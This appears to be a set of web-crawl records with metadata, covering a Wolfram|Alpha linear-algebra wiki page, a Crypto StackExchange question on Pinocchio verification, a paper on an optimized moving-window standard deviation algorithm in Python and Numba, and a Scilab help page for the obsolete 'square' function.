Reduce a Matrix\n\nW|A Query: rref[{{2,0},{1,3}}\n\nResult: Wolfram|Alpha provides the reduced row echelon form of the matrix, which in this case is the identity matrix. There is no \"Show Steps\" option, and no additional information is provided. Note that W|A provides the result in list form, not in matrix notation. To see the result in matrix notation, use the following command: matrixform[rref[ {{0,1,4,-5},{1,3,5,-2},{3,7,7,6}}] ]\n\nLimitations: Wolfram|Alpha appears to have an input limit of 200 characters. This limits the usefulness of Wolfram|Alpha in row-reducing large matrices and matrices with real-world data (which often has several significant figures). For instance, the following command maxxes out Wolfram|Alpha's input limit:\n\nThe matrix involved isn't very large, only 5 x 6:\n\n(1)\n\\begin{align} \\left [ \\begin{matrix} -0.5893 & 0.0352 & 0.05 & 0.0587 & 0.1093 & 0\\\\ .0582 & -.5882 & .1241 & .0922 & .2674 & 0\\\\ .0665 & .1532 & -.799 & .3151 & .4856 & 0\\\\ .0742 & .1021 & .0773 & -.711 & .1289 & 0\\\\ .3904 & .2977 & .5476 & .2451 & -.9912 & 0 \\end{matrix} \\right ] \\end{align}\n\nHowever, the entries have several digits each (for the most part), resulting in the command hitting Wolfram|Alpha's limit.\n\nWolfram|Alpha apparently has a size limit, too. For example, Wolfram|Alpha can't handle the following command:\n\nThe matrix involved, however, is only 5 x 8:\n\n(2)\n\\begin{align} \\left [ \\begin{matrix} 1 & 0 & 1 & 0 & 0 & 0 & 0 & 800\\\\ 0 & 0 & 1 & 0 & 0 & 1 & 0 & 750\\\\ 0 & -1 & 1 & 0 & 0 & 1 & 0 & 200\\\\ 1 & -1 & 0 & 1 & 0 & 0 & 0 & 200\\\\ 0 & 0 & 0 & 1 & 0 & 1 & -1 & 600 \\end{matrix} \\right ] \\end{align}\n\nOmitting one of the rows to produce a 4 x 8 matrix works fine, however.\n\n## Matrix-Vector Multiplication\n\nExample: Multiply the matrix\n\n(3)\n\\begin{align} \\left [ \\begin{matrix} .5 & .4 & .6\\\\ .2 & .2 & .3\\\\ .3 & .4 & .1 \\end{matrix} \\right ] \\end{align}\n\nby the vector\n\n(4)\n\\begin{align} \\left [ \\begin{matrix} 500\\\\200\\\\300 \\end{matrix} \\right ]. \\end{align}\n\nResults: Wolfram|Alpha performs the operation as expected, yielding the result {510, 230, 260}. Also provided is the sum and average of the components of this vector, as well as its length, normalization, and spherical coordinates. This is consistent with how Wolfram|Alpha treats vectors.\n\nFor some reason (perhaps because the matrix involved is stochastic), Wolfram|Alpha also converts the result into a pie chart:", null, "# Linear Systems\n\n## Solve a Matrix Equation\n\nW|A Query: solve {{2,0},{1,3}}.{x1,x2}={3,5}\n\nResults: Wolfram|Alpha provides the solution to this simple matrix equation,\n\n(5)\n\\begin{align} x_1 = \\frac{3}{2}, x_2 = \\frac{7}{6}. \\end{align}\n\nThere is no \"Show Steps\" option, and no additional information is provided.\n\npage revision: 19, last edited: 01 Oct 2009 01:28" ]
[ null, "http://walphawiki.wikidot.com/local--files/linear-algebra/matrixplot.jpg", null, "http://walphawiki.wikidot.com/local--files/linear-algebra/wapiechart.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90940064,"math_prob":0.98556054,"size":4329,"snap":"2022-05-2022-21","text_gpt3_token_len":1147,"char_repetition_ratio":0.14289017,"word_repetition_ratio":0.029950082,"special_character_ratio":0.28644028,"punctuation_ratio":0.2324873,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9908066,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-16T15:46:17Z\",\"WARC-Record-ID\":\"<urn:uuid:d6f3ef8d-0c2b-47d3-933e-6e512766dc75>\",\"Content-Length\":\"36148\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6c5a86fa-974b-4243-a6a8-5cbb52d1b514>\",\"WARC-Concurrent-To\":\"<urn:uuid:ac603b17-eccc-4d4e-aac0-5307885b286a>\",\"WARC-IP-Address\":\"107.20.139.176\",\"WARC-Target-URI\":\"http://walphawiki.wikidot.com/linear-algebra\",\"WARC-Payload-Digest\":\"sha1:5GF5ZB43H7W3HNPSHZERYBZJX4VURFPU\",\"WARC-Block-Digest\":\"sha1:NCJ2H7BJQSMPJUS22IOV6OMYGRZRXXYT\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662510138.6_warc_CC-MAIN-20220516140911-20220516170911-00361.warc.gz\"}"}
https://crypto.stackexchange.com/questions/25145/verification-of-pinocchio-verifiable-computation
[ "# Verification of Pinocchio (verifiable computation)\n\nI am reading the Pinocchio paper. The calculated result $y$ is a part of the verification input, but it seems to me, the verification procedure does not utilize the result $y$. Can anyone can help me to understand this?\n\n• You should probably add a link to the paper and make it easier for readers to find this $y$ and the verification procedure in the paper. – K.G. Apr 22 '15 at 7:45\n\n$y$ is the values of the output wires, so it is used to compute $g_v^{v_{io}(s)}$, $g_w^{w_{io}(s)}$, and $g_y^{y_{io}(s)}$. (Remember that $c_k$ is the value of the wire with index $k$.)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87087405,"math_prob":0.9824409,"size":598,"snap":"2020-34-2020-40","text_gpt3_token_len":172,"char_repetition_ratio":0.12794612,"word_repetition_ratio":0.0,"special_character_ratio":0.3043478,"punctuation_ratio":0.109375,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99909234,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-12T00:41:57Z\",\"WARC-Record-ID\":\"<urn:uuid:7b04ba29-8abc-4dd7-a71d-116b90a6e48d>\",\"Content-Length\":\"144972\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:93a7e9db-5192-47ee-9044-af730dcaaac5>\",\"WARC-Concurrent-To\":\"<urn:uuid:ee4169e7-f477-4465-8ee7-2f68a3fd9074>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://crypto.stackexchange.com/questions/25145/verification-of-pinocchio-verifiable-computation\",\"WARC-Payload-Digest\":\"sha1:WOE6OJCEP4YSO4WC4JXBIHZBDOVTKWD6\",\"WARC-Block-Digest\":\"sha1:GAQVT5USYSU4GRIBBUTSZJXVPXCQPMV2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439738858.45_warc_CC-MAIN-20200811235207-20200812025207-00034.warc.gz\"}"}
https://scirp.org/journal/paperinformation.aspx?paperid=101849
[ "Development and Parallelization of an Improved 2D Moving Window Standard Deviation Python Routine for Image Segmentation Purposes\n\nAbstract\n\nTwo additional features are particularly useful in pixelwise satellite data segmentation using neural networks: one results from local window averaging around each pixel (MWA) and another uses a standard deviation estimator (MWSD) instead of the average. While the former’s complexity has already been solved to a satisfying minimum, the latter did not. This article proposes a new algorithm that can substitute a naive MWSD, by making the complexity of the computational process fall from O(N2n2) to O(N2n), where N is a square input array side, and n is the moving window’s side length. The Numba python compiler was used to make python a competitive high-performance computing language in our optimizations. Our results show efficiency benchmars\n\nShare and Cite:\n\nConceição, M. , Mendonça, L. and Lentini, C. (2020) Development and Parallelization of an Improved 2D Moving Window Standard Deviation Python Routine for Image Segmentation Purposes. Computational Water, Energy, and Environmental Engineering, 9, 75-85. doi: 10.4236/cweee.2020.93006.\n\n1. Introduction\n\nImage segmentation consists of partitioning image pixels into a set of regional categories . This process can be significantly improved by using two additional images (image features) based on two fundamental statistical concepts, if they are also input to neural networks , a technique that creates a fertile field for segmentation solutions . These image features can be seen in Figure 1 and are described as follows:\n\n1) n × n moving window average (MWA): classical MWA, where the value of the central pixel in the array is replaced by its n × n window average; and\n\n1) n × n moving window standard deviation (MWSD): similar to the MWA, but the value of the central pixel is replaced by the standard deviation of the moving array.\n\nLocal window functions are not restricted to image segmentation: they are routinely used for suppressing noise in filter operations . That aside, their usage in segmentation is well established in the literature .\n\nThe first image attribute (MWA) is calculated by convolving the original image with a specific kernel, which is a matrix filled by 1/n2. Furthermore, these convolutions can be calculated in a faster way via products in a frequency domain. Likewise, this process can get even faster by integrating a method called “overlap-and-add”. In this case, if the inputs are N × N arrays, the computational time is given by O(N2 log2n) , which is much lesser than a naïve convolution algorithm’s: O(N2 n2).\n\nAny process that can be written in convolutional terms (as MWA) can be implemented in such a way to get these benefits. However, the MWSD has a restriction, since the standard deviation is not a linear operation itself, and has the same computational complexity as a naïve convolution algorithm (O(N2 n2)).\n\nAs the square dependency with N cannot be solved in any of the mentioned algorithms, the important variable to pay attention here is n: the moving window side length.\n\nChoosing useful n × n kernel dimensions for a specific process is usually made as a heuristic trial and error process, and depends on the data properties, especially spatial resolution and noise signature. The growth of SAR spatial resolution in the last decades comes with downside of bigger image dimensions. At the same proportion, the kernel window size search space is increased. As an example, a 3 × 3 MWA applied over an old ENVISAT ASAR sensor data would get similar results to applying a 45 × 45 MWA over new Sentinel-1 data, in spatial terms, while in this last case the equivalent computation would be 225 times slower.\n\nTherefore, the core of this article is to propose a new methodology using an algorithm that replaces the usual 2D MWSD, in order to decrease its computational complexity, as there are no other works dealing with this problem and a researcher needs freedom to study various kernel sizes in a timely manner in\n\nFigure 1. Original Sentinel-1 image and two image features.\n\norder to find the one that best fits his models. The idea behind it is saving some of the calculations done at the first pixel of a row to the next one and so on, after an optimized analytical reformulation of the standard deviation calculation is performed. Additionally, our algorithms were thought to be used in context of CPU parallelism, being intelligently designed to take advantage with a faster runtime.\n\nFollowing strong open source global trends, and seeking to benefit the maximum of users, our codes were written in Python, as this language is commonly used in the context of machine learning, and is available online in a public GitHub repository.\n\nPython is indeed developed to be a high-level, interpreted language and as consequence, generally slower than C or Fortran at runtime , but this problem is already addressed by free packages that allow python compilation and lower level optimization of code.\n\nThe Numba package is an example. Described as “a high-performance Python compiler”, Numba is a Python library meant to compile Python functions (even though it is an interpreted language by default). By doing this, they gain C-like velocity, being generally compatible with NumPy—a widely used linear algebra package for Python.\n\nThis work was developed as part of a set of digital image processing routines, to be an improved tool for automatic classifiers already used in remote sensing studies, which aims to make a comparison between the usual performance of the 2D MWSD algorithm and ours, before and after being compiled with Numba.\n\n2. Methodology\n\nFirst, the methodological process was developed with three test algorithms: 1) a “didactic” MWSD, 2) a “better” MWSD and 3) an “optimized” MWSD. These algorithms are introduced and discussed below for a 1D matrix and a 1D window. After the first theoretical assessments stage, the first and last algorithms were extended to the second dimension (2D input array and 2D window). They were programmed and tested both theoretically and practically, before and after being compiled, so that we can compare them in terms of computational efficiency.\n\n2.1. Didactic Algorithm\n\nFor didactic purposes, the standard deviation of a series of observations is defined in terms of its variance—an average over all squared differences between the observations and their average value—as in Equation (1):\n\n$\\sigma =\\sqrt{\\frac{\\underset{i=0}{\\overset{{n}_{e}}{\\sum }}\\left({\\text{x}}_{i}-\\stackrel{¯}{x}\\right)}{{n}_{e}}}$ , (1)\n\nwhere σ is the standard deviation of ne elements xi, and $\\stackrel{¯}{x}$ is their mean value. The standard deviation of a dataset serves as a measure of how disperse are its elements. As $\\stackrel{¯}{x}$ is part of the calculation, this process takes a total of 4ne + 1 operations.\n\nThe denominator ne is sometimes exchanged with ne − 1, what is called Bessel’s correction and is useful to remove part of standard deviation estimator bias when ne is small. We are not going to use Bessels correction in this article, as it is not relevant for image segmentation.\n\nFrom a generic 1D array of N elements, it’s possible to create another of similar shape, so that each element i therein is the standard deviation of 3 adjacent values in the original array, making a window centered at the ith position. When one of the values does not exist in these windows, we make it zero for the sake of calculation. This array is the result of a one-dimensional MWSD over the original array.\n\nThis process is equivalent to pad the older array with zeros, then slide a window of size, n = 3, through that array, method already proposed in the literature . Every time the window is updated, a standard deviation is calculated, and the result stacked in the new array. This process takes then 13N operations, or in a more general case, for any window size n, N(4n + 1).\n\nThis method is effective. However, in many cases, it has an extense processing time. There are many faster ways to calculate MWSD, and an example is shown in next section.\n\n2.2. Better Algorithm\n\nIn order to develop a more efficient algorithm, simple manipulation of Equation (1) can lead to Equation (2):\n\n$\\sigma =\\sqrt{\\frac{\\underset{i=0}{\\overset{{n}_{e}}{\\sum }}{x}_{i}^{2}}{{n}_{e}}-{\\left[\\frac{\\underset{i=0}{\\overset{{n}_{e}}{\\sum }}{x}_{i}}{{n}_{e}}\\right]}^{2}}$ (2)\n\nWith no more tricks, this formula makes computing the standard deviation of an array of n e elements much faster: only 3ne + 3 operations are needed, as one only loop must be used. Also, thinking about the problem just exposed in last section about 1D MWSD calculation, we would only make N(3n + 3) operations to get the same task done. In other words, when the window size, n, gets big, approximately 1/4 less operations are made. It’s important to observe that efficiency and intelligibility do not go hand in hand: Equation (2) would not be a good introduction formula to standard deviation.\n\n2.3. Optimized Algorithm\n\nTaking 1D MWSD is a problem that gets simplified if one takes a careful look on how variables are used in Equation (2). Note that if summations are not calculated from scratch at each array element, but instead just updated when the window moves, a python pseudo-code like “optimized_mwsd_1D” (in Code 1) would be gotten.", null, "Code 1. Optimized 1D MWSD.\n\nAnd here is the advantage: what we had previously gotten with N(3n + 3) operations now costs only 11N + 3n − 7 operations. When the array side (N) is sufficiently big, the task complexity does not depend on the chosen window side, n. As this number is usually an odd number greater or equal to 3—as the window used is centered at a certain position, from the stated problem, it is right to say that our new algorithm always performs faster than our previous one.\n\n2.4. 2D Extension\n\nWhen working with 2D input data arrays of N lines and M columns, it might be useful to extend the concept of a moving window standard deviation algorithm, in a way that a window represents a 2D array, and it will move through all the array points, being once centered at each one of them. In this way, n could now be a measure to the side of the window used.\n\nMaking such alterations to the didactic algorithm explained in section 2.1, would give us a simple algorithm that needs NM(4n2 + 1) operations to be run. It means that the computational time used for making these calculations would sensibly depend on the window size used. As N and M are usually big numbers in satellite remote sensing applications, this formula might be a problem.\n\nAs the optimized algorithm could make MWSD almost does not depend on n when N is sufficiently big, the same logic was tried to be applied at the new 2D case. What is essential about this code is that the algorithm behind it would do exactly what our previous done, but only making use of N(M(6n + 5) + 3n2 − 6n − 2) + 1: most part of the calculation is done by just updating (in the term 6NMn).\n\nThese numbers may be easily understood if we assume M $\\gg$ N n ≥ 3. In such case, the exposed formulas can be approximated to 4N2n2 and 6N2n, respectively. The latest algorithm performs faster than the first, even in the limit case, when n = 3. Another great advantage of this 2D algorithm is that, as it is basically running the extended 1D algorithm at each row, we can then parallelize loops over every column, as they only depend on previous operations therein.\n\nThere are many methods to parallelize Python code, for example: using Numba , Cython , and mpi4py . As Python’s differential is that it conquers big results with little typing effort, Numba was chosen. It can frequently get almost perfect results by just changing a couple lines of code.\n\nWhile Python is usually slow for calculations because it is an interpreted language, Numba is a Python library able to compile its codes, so that it runs in C-like velocity.\n\nGetting started to Numba is a simple task. Compiling code with parallel support usually means importing the library and adding a decorator (a statement starting with @) one line before a Python function. An example is served in Code 2.\n\nThis decorator is a “just in time” compiler. It means it compiles the code when the function is first called. Although parallel argument is set to True, it just means that parallel support is enabled at compilation time. To actually make use of parallelization in our code we would need to go to the columns’ loop of our algorithm, and, instead of writing a regular range, use numba.prange for a parallel range iterator.\n\nThere is just another thing needed to be done: we previously used a function to pad the input array: “np.pad”. This function comes from NumPy library and has no compatibility with Numba. A simple function was developed to pad an array with zeros in order to finish the compilation process. There is a list of NumPy supported features in Numba’s official documentation, and it might be useful when debugging compilation.\n\n3. Results and Discussion\n\nThe algorithms developed for preparing results bellow are publicly available online at github.com/marcosrdac/mwsd. Theoretical efficiency results for 1D and 2D MWSD problems can be seen in Figure 2. Algorithms’ complexities were described in Table 1. Real results can be seen in Figure 3. Each point was calculated five times, and error bars were plotted using standard deviation (with Bessel’s correction) as dispersion estimator.", null, "Code 2. @numba.jit decorator usage.\n\nTable 1. Algorithms and their complexities.\n\nFigure 2. Theoretical performance (in operations) vs. n plot for 1D and 2D algorithms (indicated by different line styles) and different values of N (indicated by different line colors).\n\nFigure 3. Real performance (in time) vs. n plot for 2D algorithms (indicated by different line styles) and different values of N (indicated by different line colors).\n\nIt is useful to know that an MWSD algorithm made with Numpy’s “std” (the standard way a Python user would calculate standard deviation) function behaved just like “didactic” algorithm in terms of computational time.\n\nOur results were plotted in log-log plots, so that the reader can explore how the number of operations scales with respect to n, in orders of magnitude. Different line colors mean curves made with different values of array side, N. On the other hand, the different line styles distinguish curves by the algorithm used. The established conventions for colors were:\n\n· Red line: N = 100;\n\n· Green line: N = 200;\n\n· Orange line: N = 300; and\n\n· Blue line: N = 400.\n\nAlso, these were the line style conventions:\n\n· dotted line: means curve was calculated using didactic MWSD;\n\n· dashed line: means curve was calculated using better MWSD;\n\n· and continuous line: means curve was calculated using optimized MWSD.\n\nThe 1D optimized algorithm’s theoretical performance can be seen as the continuous lines at the first plot in Figure 2, and is visually almost independent from n, as expected. For n = 29, it does the same job than usual didactic 1D MWSD in an amount of time one order of magnitude bellow (compare continuous and dotted lines of the same colors).\n\nThe theoretical results get yet more interesting when talking about 2D algorithms (second plot of Figure 2). Our new algorithm is indeed faster than usual 2D MWSD, while performing the same accuracy. For a 19 pixels side window, these algorithms’ performance differs by one order of magnitude in time, and almost two of them, when window size gets to 59. Also, it’s important to know that, for greater values of N (or bigger array sizes), this difference gets even higher.\n\nReal tests were only made for 2D algorithms, as they are useful for image segmentation. Their results were plotted in Figure 3. The first plot is a pure Python/NumPy code and could only be calculated for a small range of n’s: 3, 5, 7 and 9 as they were too time consuming. The time magnitude order is in seconds, and this happens because how non-compiled Python loops are highly inefficient. Although spent times do scale with n, this variation is not big enough when compared to the intrinsic slowness of python in the case of a small window and array sides. Our results show that the proposed algorithm (continuous line) consumes less computation time than the didactic MWSD even before compilation.\n\nSome important effects are heavily seen in the bottom plot of Figure 3. The fundamental reason for them is that most part of the data stands near to the end of the plot, in consequence of the log-log plotting choice. It means that the curve trend must be visually estimated from there. Moreover, it’s known from basic calculus that polynomial curves are dominated by their term of highest exponent; the other terms’ effect is not important when abscissa get big . In a log-log plot, different exponent terms are viewed as different line slopes. Based on that, the bottom plot of Figure 3 is remarkably similar to the expected plot in Figure 2’s right: the ending slopes of all curves are both visually and numerically tending to equality when n increases. It means that both didactic and optimized MWSD algorithms have the computational complexity that was previously expected in theory.\n\nThe difference between the behavior of these two plots is better visible at the first three points of the curves (n ≤ 9), and is completely understandable: theoretical formulas only account for MWSD, not for the previous process of padding the input array (that only exists to assert input and output arrays are of the same sizes) and allocating memory for output. This consumes a significant time for slow values of n and can be seen as a different, lesser slope at the beginning of the second plot of Figure 3. Besides this effect, its resemblance to the second plot of Figure 2 is clear and validates this article. We emphasize here the importance of computational time to the compiled algorithms’; their magnitude is in ms.\n\nThis technique is very useful in satellite remote sensing studies, as it can estimate textural characteristics of an image, being convenient to robust methods of segmentation, such as neural networks. As an example, oil slicks are easily seen in RADAR images. In number, “Interferometric Wide Single Look Complex” images are arrays of enormous dimensions, such as 13,169 × 17,241 px2. Applying this process to an 8192 × 8192 px2 subset using a didactic algorithm and n = 5 took 25 minutes to complete the process using four cores of an Intel i9 processor. After Numba compilation, this processing time went down to 11 seconds. Using our method we only needed 0.7 seconds to perform the same job. Therefore, if five images are needed to be processed by an MWSD algorithm, our method would run it in 45 seconds instead of the 12 minutes of the didactic algorithm, or 28 hours with the same algorithm without the Numba compilation.\n\n4. Conclusions\n\nIn this paper, we demonstrated that moving window standard deviation functions can have their efficiency improved with two simple steps: 1) useful reformulation of analytic formula at the cost of losing certain amount of intuitive intelligibility and 2) reusing previous calculations in future iterations.\n\nOur “optimized” (both 1D and 2D) code ran significantly faster than a naïve, completely “didactic” one, or even another that would be made using default NumPy functions. Pure Python is indeed very slow when evaluating loops and numerical results, as could be seen at our results, but this was solved by using Numba, with compilation and parallelization of code.\n\nImage segmentation is useful in many areas but is of core knowledge when it comes to environmental control. Defining areas of significant atmospheric pollution, urban occupation levels, geologic faults, and ocean phenomena are key examples of its utilities. The proposed improvement is especially useful when working with satellite data, where images compose arrays of large dimensions, and even auxiliary processes can frequently take considerable amount of time.\n\nOnce our algorithm has a linear time dependency with the window side used, scientists can now feel free to study a higher variety spatial window sizes in order to produce their best models.\n\nFuture developments and implementations of this piece of code will be added to our investigations to study machine learning pixelwise segmentation of oil spills in satellite data.\n\nAlthough MWA and MWSD were the only local window functions studied here, many other textural descriptors such as fractal dimension and entropy would be useful in window functions if more efficiently implemented. New works can also rethink this article achievement in a GPU parallelism perspective, as it grows to become a standard technique in high performance computing.\n\nAcknowledgements\n\nWe are grateful to the Satellite Oceanography Laboratory (LOS) of the Geo-sciences Institute (IGEO) of the Federal University of Bahia (UFBA) for providing the facilities for the conduction of the experiments and data analysis. LOS is partially financially supported by the National Council for Scientific and Technological Development (CNPq—Research Grant #424495/2018-0). The first author also would like to thank the Undergraduate Research Mentorship Program at UFBA for his scholarship under the same research grant.\n\nConflicts of Interest\n\nThe authors declare no conflicts of interest regarding the publication of this paper.\n\n Shapiro, L.G. and Stockman, G.C. (2001) Computer Vision. Prentice Hall, Upper Saddle River. Singha, S., Bellerby, T.J. and Trieschmann, O. (2013) Satellite Oil Spill Detection Using Artificial Neural Networks. IEEE Journal of Selected Topics in Applied Earth Observations and Remote Sensing, 6, 2355-2363. https://doi.org/10.1109/JSTARS.2013.2251864 Garcia-Pineda, O., MacDonald, I.R., Li, X., Jackson, C.R. and Pichel, W.G. (2013) Oil Spill Mapping and Measurement in the Gulf of Mexico with Textural Classifier Neural Network Algorithm (TCNNA). IEEE Journal of Selected Topics in Applied Earth Observations and Remote Sensing, 6, 2517-2525. https://doi.org/10.1109/JSTARS.2013.2244061 Awad, M. (2010) An Unsupervised Artificial Neural Network Method for Satellite Image Segmentation. The International Arab Journal of Information Technology, 7, 199-205. Liu, Y., Zhang, M.H., Xu, P. and Guo, Z.W. (2017) SAR Ship Detection Using Sea-Land Segmentation-Based Convolutional Neural Network. 2017 IEEE International Workshop on Remote Sensing with Intelligent Processing, Shanghai, 18-21 May 2017, 1-4. https://doi.org/10.1109/RSIP.2017.7958806 Wang, S.-H., et al. (2018) Polarimetric Synthetic Aperture Radar Image Segmentation by Convolutional Neural Network Using Graphical Processing Units. Journal of Real-Time Image Processing, 15, 631-642. https://doi.org/10.1007/s11554-017-0717-0 Prabhu, K.M. (2013) Window Functions and Their Applications in Signal Processing. CRC Press. Mastriani, M. and Giraldez, A.E. (2016) Enhanced Directional Smoothing Algorithm for Edge-Preserving Smoothing of Synthetic-Aperture Radar Images. Maussang, F., Chanussot, J., Hétet, A. and Amate, M. (2007) Mean-Standard Deviation Representation of Sonar Images for Echo Detection: Application to SAS Images. IEEE Journal of Oceanic Engineering, 32, 956-970. https://doi.org/10.1109/JOE.2007.907936 Li, H. and Cao, J. (2010) Detection and Segmentation of Moving Objects Based on Support Vector Machine. 2010 IEEE Third International Symposium on Information Processing, Qingdao, 15-17 October 2010, 193-197. https://doi.org/10.1109/ISIP.2010.35 Highlander, T. and Rodriguez, A. (2016) Very Efficient Training of Convolutional Neural Networks Using Fast Fourier Transform and Overlap-and-Add. In: Xie, X.H., Jones, M.W. and Tam, G.K.L., Eds., Proceedings of the British Machine Vision Conference (BMVC), BMVA Press, Guildford, 160.1-160.9. https://doi.org/10.5244/C.29.160 Lubin, M. and Dunning, I. (2015) Computing in Operations Research Using Julia. INFORMS Journal on Computing, 27, 238-248. https://doi.org/10.1287/ijoc.2014.0623 Lam, S.K., Pitrou, A. and Seibert, S. (2015) Numba: A LLVM-Based Python JIT Compiler. Proceedings of the Second Workshop on the LLVM Compiler Infrastructure in HPC, November 2015, 1-6. https://doi.org/10.1145/2833157.2833162 So, S. (2008) Why Is the Sample Variance a Biased Estimator? Griffith University, Brisbane, Tech. Rep. 9. Ma, Y.Z. (2019) Quantitative Geosciences: Data Analytics, Geostatistics, Reservoir Characterization and Modeling. Springer International Publishing, Berlin. https://doi.org/10.1007/978-3-030-17860-4 Murray, M.R. and Baker, D.E. (1991) MWINDOW: An Interactive FORTRAN-77 Program for Calculating Moving-Window Statistics. Computers & Geosciences, 17, 423-430. https://doi.org/10.1016/0098-3004(91)90049-J Behnel, S., et al. (2011) Cython: The Best of Both Worlds. Computing in Science & Engineering, IEEE Computer Society, 13, 31-39. https://doi.org/10.1109/MCSE.2010.118 Behnel, S., Bradshaw, R., Citro, C., Dalcin, L., Seljebotn, D.S. and Smith, K. (2011) Cython: The Best of Both Worlds. Computing in Science & Engineering, 13, 31-39. https://doi.org/10.1109/MCSE.2010.118 Guidorizzi, H.L. (2012) Um curso de cálculo, Vol. 1, 5a edicao. Grupo Gen-LTC.", null, "", null, "", null, "", null, "", null, "[email protected]", null, "+86 18163351462(WhatsApp)", null, "1655362766", null, "", null, "Paper Publishing WeChat", null, "" ]
[ null, "https://html.scirp.org/file/3-2570241x7.png", null, "https://html.scirp.org/file/3-2570241x9.png", null, "https://scirp.org/images/Twitter.svg", null, "https://scirp.org/images/fb.svg", null, "https://scirp.org/images/in.svg", null, "https://scirp.org/images/weibo.svg", null, "https://scirp.org/images/emailsrp.png", null, "https://scirp.org/images/whatsapplogo.jpg", null, "https://scirp.org/Images/qq25.jpg", null, "https://scirp.org/images/weixinlogo.jpg", null, "https://scirp.org/images/weixinsrp120.jpg", null, "https://scirp.org/Images/ccby.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9378031,"math_prob":0.89580256,"size":20029,"snap":"2022-05-2022-21","text_gpt3_token_len":4289,"char_repetition_ratio":0.12459426,"word_repetition_ratio":0.01518309,"special_character_ratio":0.21119377,"punctuation_ratio":0.09741126,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9846787,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,4,null,4,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-23T03:02:10Z\",\"WARC-Record-ID\":\"<urn:uuid:4b63debd-6827-41b8-9ec9-96e9a5712e87>\",\"Content-Length\":\"124693\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6ff23194-f08e-4ea7-bcd0-4f959b379090>\",\"WARC-Concurrent-To\":\"<urn:uuid:f8a8b222-1213-47ad-879f-6ab4f33ffd6e>\",\"WARC-IP-Address\":\"144.126.144.39\",\"WARC-Target-URI\":\"https://scirp.org/journal/paperinformation.aspx?paperid=101849\",\"WARC-Payload-Digest\":\"sha1:M5M66WNRJ5YEAIUD7LK6CWBOYYQK3SK2\",\"WARC-Block-Digest\":\"sha1:JWI5VC3DLH6NRDYKSBBHCB7G6CQCMXQA\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662552994.41_warc_CC-MAIN-20220523011006-20220523041006-00162.warc.gz\"}"}
https://help.scilab.org/docs/6.0.2/ru_RU/square.html
[ "Scilab Home page | Wiki | Bug tracker | Forge | Mailing list archives | ATOMS | File exchange\nChange language to: English - Français - Português - 日本語 -\nСправка Scilab >> Графики > axes_operations > square\n\n# square\n\nset scales for isometric plot (change the size of the window) (function obsolete)\n\n### Syntax\n\n`square(xmin, ymin, xmax, ymax)`\n\n### Arguments\n\nxmin, xmax, ymin, ymax\n\nfour real values.\n\n### Description", null, "This function is obsolete. It will be removed in Scilab 6.1.", null, "Please replace `square(a,b,c,d)` with `gcf().axes_size = [n n]; replot([a b c d])` where `n` is the size in pixels of the desired graphic square window. This replacement can be extended to any existing graphic window, not only the current one.\n\n`square` is used to have isometric scales on the x and y axes. The requested values `xmin`, `xmax`, `ymin`, `ymax` are the boundaries of the graphics frame and `square` changes the graphics window dimensions in order to have an isometric plot. `square` sets the current graphics scales and can be used in conjunction with graphics routines which request the current graphics scale (for instance `strf=\"x0z\"` in `plot2d`).\n\n### Examples\n\n```t=[0:0.1:2*%pi]';\nplot2d(sin(t),cos(t))\nclf()\nsquare(-1,-1,1,1)\nplot2d(sin(t),cos(t))```\n\n• isoview — настраивает изометрическое представление графических осей\n• xsetech — set the sub-window of a graphics window for plotting\n\n### History\n\n Версия Описание 6.0 square() is tagged as obsolete. It will be removed from Scilab 6.1" ]
[ null, "https://help.scilab.org/docs/6.0.2/ru_RU/ScilabWarning.png", null, "https://help.scilab.org/docs/6.0.2/ru_RU/ScilabWarning.png", null ]
